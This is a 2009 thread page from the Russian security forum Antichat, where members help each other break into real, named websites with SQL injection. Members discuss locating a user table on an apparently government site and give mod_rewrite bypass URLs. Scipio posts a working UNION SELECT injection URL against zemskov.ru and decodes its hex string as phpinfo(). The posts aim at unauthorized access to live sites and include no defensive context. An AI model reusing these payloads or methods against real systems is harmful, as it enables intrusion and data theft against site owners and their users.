ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #6691  
Старый 13.04.2009, 21:09
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435

Репутация: 90
По умолчанию

Цитата:
Сообщение от DrAssault  
В таком случае встречный вопрос, таблицу с юзерами от чего ты ищешь, реги так сказать я там тоже не наблюдаю... хотя если только на поддомене: dd.openworld.gov жаль акка нет, регаться влом... насчет форума точно сказать не могу...
Я уже задал вопрос!
 

  #6692  
Старый 13.04.2009, 21:10
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

+++AndreyDevil+++, ОМГ =) а ничего что форум может быть вовсе не здесь, а на соседнем сайте? reverse-ip вам в руки =) а так еще проще concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME) тогда будете еще знать в какой БД данная таблица, может дать наводку где это искать...
 

  #6693  
Старый 13.04.2009, 21:19
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

+++AndreyDevil+++
phpbb - скелет в шкафу он там когдато был(проверь по гуглу ), форум снесли , а таблицы забыли.
 

  #6694  
Старый 13.04.2009, 21:23
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию

http://web.archive.org/web/20031121221659/http://www.openworld.gov/
был, теперь нету.. ищи то, куда можно подставить данные из sys_user
 

  #6695  
Старый 14.04.2009, 02:39
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

Здравствуйте

Вопрос
на сайте www.sait.ru/new's.html
Пишет: You have an error in your SQL syntax... и.т.д
можно ли делать запрос, и kak вообще это должно выглядит.

пробовал так: www.sait.ru/news+group+by+1+.html
Неправильно )))
 

  #6696  
Старый 14.04.2009, 02:49
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

А если так?
Код:
http://www.sait.ru/news+group+by+1/*.html
http://www.sait.ru/news/**/group/**/by/**/1.html
Вообще там mod_rewrite. ВОзможно скуль с посимвольным......
 

  #6697  
Старый 14.04.2009, 03:48
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

www.zemskov.ru

таких вообще много где в конце .html

но толком не знаю kak делать запрос.
кто нибудь может показать на примере или мост есть статья .
 

  #6698  
Старый 14.04.2009, 05:22
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Забавная инъекция
Код:
http://www.zemskov.ru/e_mail' and 1=2 union select 1,0x706870696e666f28293b,3,4,5,6,7,8,9,10,11,12,13,14,15+--+.html
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 14.04.2009 в 05:41..
 

  #6699  
Старый 14.04.2009, 05:30
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

откудого ты подобрал эти символы ??
%20 это видимо пробле. а остальное ?


спасибо )
 

  #6700  
Старый 14.04.2009, 05:42
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

0x706870696e666f28293b=phpinfo();
__________________
Карфаген должен быть разрушен...
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ